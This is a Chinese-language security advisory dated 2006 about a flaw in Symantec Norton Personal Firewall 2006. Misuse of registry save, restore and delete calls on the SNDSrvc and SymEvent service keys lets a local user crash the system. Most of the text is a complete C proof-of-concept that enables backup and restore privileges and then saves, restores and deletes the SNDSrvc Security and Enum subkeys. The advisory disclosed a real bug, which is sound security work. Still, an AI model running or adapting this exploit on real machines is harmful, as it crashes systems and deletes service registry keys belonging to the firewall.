| 2006-7-19
受影响系统:
Symantec Norton Personal Firewall 2006 9.1.0.33
描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 18995
Symantec Norton个人防火墙是非常流行的防火墙软件。
Norton个人防火墙实现上存在漏洞,本地攻击者可能利用此漏洞对防火墙执行拒绝服务攻击。
Norton防火墙没有正确地检查对标准Windows API函数RegSaveKey、RegRestoreKey和RegDeleteKey的调用。对注册表项 HKLM\SYSTEM\CurrentControlSet\Services\SNDSrvc 或 HKLM\SYSTEM\CurrentControlSet\Services\SymEvent 组合调用上述函数,会触发Norton驱动实现中的错误,导致系统崩溃。下面的测试程序在调用这些函数之前先启用了备份和还原特权(SE_BACKUP_NAME、SE_RESTORE_NAME),这表明触发该问题的本地账户应当需要持有这两项特权。
<*来源:David Matousek (david@matousec.com) 链接:http://marc.theaimsgroup.com/?l=bugtraq&m=115298587710164&w=2 *>
测试方法: --------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*
Testing program for Insufficient protection of Norton service registry keys (BTP00004P002NF)
Usage: prog (the program is executed without special arguments)
Description: This program calls standard registry functions on the registry key "HKLM\SYSTEM\CurrentControlSet\Services\SNDSrvc", which results in a system crash. The system also crashes if the registry key "HKLM\SYSTEM\CurrentControlSet\Services\SymEvent" is used.
Test: Running the testing program.
*/
#include <stdio.h>
#include <windows.h>
/*
 * about - write the test program's banner to stdout.
 *
 * Emits the program title, project name, copyright line and project URL,
 * followed by one blank line.
 */
void about(void)
{
    static const char *const banner[] = {
        "Testing program for Insufficient protection of Norton service registry keys (BTP00004P002NF)\n",
        "Windows Personal Firewall analysis project\n",
        "Copyright 2006 by Matousec - Transparent security\n",
        "http://www.matousec.com/\n\n",
    };

    /* None of the lines contains a conversion specifier, so fputs emits
     * exactly what printf would. */
    for (size_t i = 0; i < sizeof banner / sizeof banner[0]; i++) {
        fputs(banner[i], stdout);
    }
}
/*
 * usage - write the command-line help text to stdout.
 *
 * The program takes no arguments; the text says so.
 */
void usage(void)
{
    static const char help_text[] =
        "Usage: test\n" " (the program is executed without special arguments)\n";

    fputs(help_text, stdout);
}
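/*
 * print_last_error - report the calling thread's last Win32 error on stderr.
 *
 * Reads GetLastError() once, asks the system for the matching message text
 * and prints both the numeric code and the text. If no text can be produced,
 * only the code is printed.
 *
 * NOTE(review): the message is printed with "%s", which matches LPTSTR only
 * in a non-UNICODE build; the rest of the file passes narrow string literals
 * to the registry API, so that appears to be the intended configuration.
 */
void print_last_error(void)
{
    LPTSTR buf = NULL;
    /* Capture the code first: the calls below may overwrite the last-error value. */
    DWORD code = GetLastError();

    /*
     * FORMAT_MESSAGE_IGNORE_INSERTS: no argument array is supplied, so insert
     * sequences such as %1 in a system message must be copied through rather
     * than expanded from a missing argument list.
     */
    if (FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM |
                          FORMAT_MESSAGE_IGNORE_INSERTS,
                      NULL, code, 0, (LPTSTR)&buf, 0, NULL)) {
        /* DWORD is unsigned long; "%d" was a specifier/argument mismatch. */
        fprintf(stderr, "Error code: %lu\n", (unsigned long)code);
        fprintf(stderr, "Error message: %s", buf);
        /* With FORMAT_MESSAGE_ALLOCATE_BUFFER the buffer is owned by the caller. */
        LocalFree(buf);
    } else {
        fprintf(stderr, "Unable to format error message for code %lu.\n", (unsigned long)code);
    }
}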
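/*
 * enable_privilege - enable one named privilege in the calling process's token.
 *
 * priv_name: privilege name as accepted by LookupPrivilegeValue
 *            (the file passes SE_BACKUP_NAME and SE_RESTORE_NAME).
 *
 * Returns nonzero only if the privilege is enabled afterwards, 0 otherwise.
 * A privilege can only be enabled if the token already holds it; this call
 * does not grant anything the account was not given.
 */
int enable_privilege(char *priv_name)
{
    int enabled = 0;
    HANDLE tok;
    LUID luid;
    TOKEN_PRIVILEGES privs;

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &tok)) {
        return 0;
    }

    if (LookupPrivilegeValue(NULL, priv_name, &luid)) {
        DWORD ret_len;

        privs.PrivilegeCount = 1;
        privs.Privileges[0].Luid = luid;
        privs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

        /*
         * AdjustTokenPrivileges returns nonzero even when the token does not
         * hold the requested privilege; that case is reported only through
         * GetLastError() == ERROR_NOT_ALL_ASSIGNED, so both must be checked.
         */
        if (AdjustTokenPrivileges(tok, 0, &privs, sizeof(TOKEN_PRIVILEGES), NULL, &ret_len) &&
            GetLastError() == ERROR_SUCCESS) {
            enabled = 1;
        }
    }

    /* Close the token on every path; the handle used to leak when the
     * privilege name lookup failed. */
    CloseHandle(tok);
    return enabled;
}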
/*
 * enable_backup_privilege - request SE_BACKUP_NAME for the current process.
 *
 * Returns the result of enable_privilege() unchanged.
 */
int enable_backup_privilege(void)
{
    int status = enable_privilege(SE_BACKUP_NAME);

    return status;
}
/*
 * enable_restore_privilege - request SE_RESTORE_NAME for the current process.
 *
 * Returns the result of enable_privilege() unchanged.
 */
int enable_restore_privilege(void)
{
    int status = enable_privilege(SE_RESTORE_NAME);

    return status;
}
/*
 * main - run the registry save / restore / delete sequence from the file
 * header against two subkeys of the SNDSrvc service key.
 *
 * argc and argv are not used. None of the API return values below is checked.
 * The function always prints "TEST FAILED!" and returns 1 when it reaches the
 * end; per the file header the expected outcome on an affected system is a
 * crash, so presumably that line is only reached when no crash occurred.
 *
 * Precondition visible here: the backup and restore privileges are requested
 * first. RegSaveKey and RegRestoreKey are documented to need them, so an
 * account that does not hold both should not get past those calls.
 */
int main(int argc,char **argv)
{
  about();

  /* Results are ignored: the sequence below runs even if a privilege could
   * not be enabled. */
  enable_restore_privilege();
  enable_backup_privilege();

  /*
   * Subkey 1: SNDSrvc\Security.
   * Save the key to the file "bug.regsav" (a relative name, so it lands in the
   * process's current directory), reopen the key with
   * REG_OPTION_BACKUP_RESTORE, restore it from that file, remove the file,
   * then delete the key.
   * NOTE(review): `key` is never initialized; if RegOpenKeyEx or
   * RegCreateKeyEx fails, the following calls receive an indeterminate handle.
   */
  HKEY key;
  RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SNDSrvc\\Security",0,KEY_READ,&key);
  RegSaveKey(key,"bug.regsav",NULL);
  RegCloseKey(key);
  RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SNDSrvc\\Security",0, NULL,REG_OPTION_BACKUP_RESTORE,0,NULL,&key,NULL);
  RegRestoreKey(key,"bug.regsav",0);
  RegCloseKey(key);
  DeleteFile("bug.regsav");
  RegDeleteKey(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SNDSrvc\\Security");

  /* Subkey 2: SNDSrvc\Enum, same sequence and same temporary file name. */
  RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SNDSrvc\\Enum",0,KEY_READ,&key);
  RegSaveKey(key,"bug.regsav",NULL);
  RegCloseKey(key);
  RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SNDSrvc\\Enum",0, NULL,REG_OPTION_BACKUP_RESTORE,0,NULL,&key,NULL);
  RegRestoreKey(key,"bug.regsav",0);
  RegCloseKey(key);
  DeleteFile("bug.regsav");
  RegDeleteKey(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SNDSrvc\\Enum");

  /*
   * Disabled by the author: the same sequence against the SymEvent service
   * key, which the file header says behaves the same way.
   *
  HKEY key;
  RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SymEvent\\Security",0,KEY_READ,&key);
  RegSaveKey(key,"bug.regsav",NULL);
  RegCloseKey(key);
  RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SymEvent\\Security",0, NULL,REG_OPTION_BACKUP_RESTORE,0,NULL,&key,NULL);
  RegRestoreKey(key,"bug.regsav",0);
  RegCloseKey(key);
  DeleteFile("bug.regsav");
  RegDeleteKey(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SymEvent\\Security");

  RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SymEvent\\Enum",0,KEY_READ,&key);
  RegSaveKey(key,"bug.regsav",NULL);
  RegCloseKey(key);
  RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SymEvent\\Enum",0, NULL,REG_OPTION_BACKUP_RESTORE,0,NULL,&key,NULL);
  RegRestoreKey(key,"bug.regsav",0);
  RegCloseKey(key);
  DeleteFile("bug.regsav");
  RegDeleteKey(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SymEvent\\Enum");
  */

  /* Reached only if the process is still running after the sequence above. */
  printf("\nTEST FAILED!\n");
  return 1;
}
建议: -------------------------------------------------------------------------------- 厂商补丁:
Symantec -------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.symantec.com/sabu/nis/npf/
|